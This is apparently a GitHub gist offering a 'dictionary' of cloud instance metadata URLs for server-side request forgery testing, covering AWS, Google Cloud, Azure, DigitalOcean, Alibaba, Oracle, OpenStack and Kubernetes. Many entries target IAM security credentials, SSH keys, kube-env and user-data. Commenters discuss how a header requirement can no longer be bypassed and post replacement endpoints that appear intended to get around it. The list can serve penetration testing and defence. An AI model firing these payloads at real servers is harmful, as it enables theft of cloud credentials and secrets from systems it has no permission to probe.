Skip to content

Instantly share code, notes, and snippets.

@BuffaloWill
Last active September 30, 2024 02:53
Show Gist options
  • Save BuffaloWill/fa96693af67e3a3dd3fb to your computer and use it in GitHub Desktop.
Save BuffaloWill/fa96693af67e3a3dd3fb to your computer and use it in GitHub Desktop.
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
# ECS Task : https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html
http://169.254.170.2/v2/credentials/
## Google Cloud (Header Sometimes Required)
# https://cloud.google.com/compute/docs/metadata
# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1
# - Most endpoints can be accessed via the v1beta API without a header
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
# kube-env; thanks to JackMc for the heads up on this (https://hackerone.com/reports/341876)
http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env
# Google allows recursive pulls
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
# returns root password for Google
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json
## Digital Ocean (No Header Required)
# https://developers.digitalocean.com/documentation/metadata/
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
## Packetcloud
https://metadata.packet.net/userdata
# Azure (Header Required)
# Header: "Metadata: true"
# https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
# (Old: ) https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
# Oracle Cloud (No Header Required)
# https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm
http://169.254.169.254/opc/v1/instance/
# Updated from jhaddix fork ===
## Alibaba
# https://www.alibabacloud.com/help/faq-detail/49122.htm
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
# ===
## OpenStack/RackSpace
# https://docs.openstack.org/nova/latest/user/metadata-service.html
http://169.254.169.254/openstack
## Oracle Cloud
# https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
## Kubernetes
# Debug Services (https://kubernetes.io/docs/tasks/debug-application-cluster/debug-service/)
https://kubernetes.default.svc.cluster.local
https://kubernetes.default
# https://twitter.com/Random_Robbie/status/1072242182306832384
https://kubernetes.default.svc/metrics
@Sw4mpf0x
Copy link

This is really helpful. Thanks!

@CircuitSoul
Copy link

amazing bro, thanks for share

@smaury
Copy link

smaury commented Apr 29, 2021

http://metadata.google.internal/computeMetadata/v1beta1/ is deprecated now and couldn't be abuse anymore to bypass the "Metadata-Flavor: Google" header requirement. 😥

@rugb1
Copy link

rugb1 commented Sep 27, 2021

http://metadata.google.internal/computeMetadata/v1beta1/ is deprecated now and couldn't be abuse anymore to bypass the "Metadata-Flavor: Google" header requirement. 😥

try this

http://metadata/computeMetadata/v1beta2/instance/attributes/dataproc-role?alt=json
http://metadata/computeMetadata/v1beta2/project/attributes/ssh-keys?alt=json

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment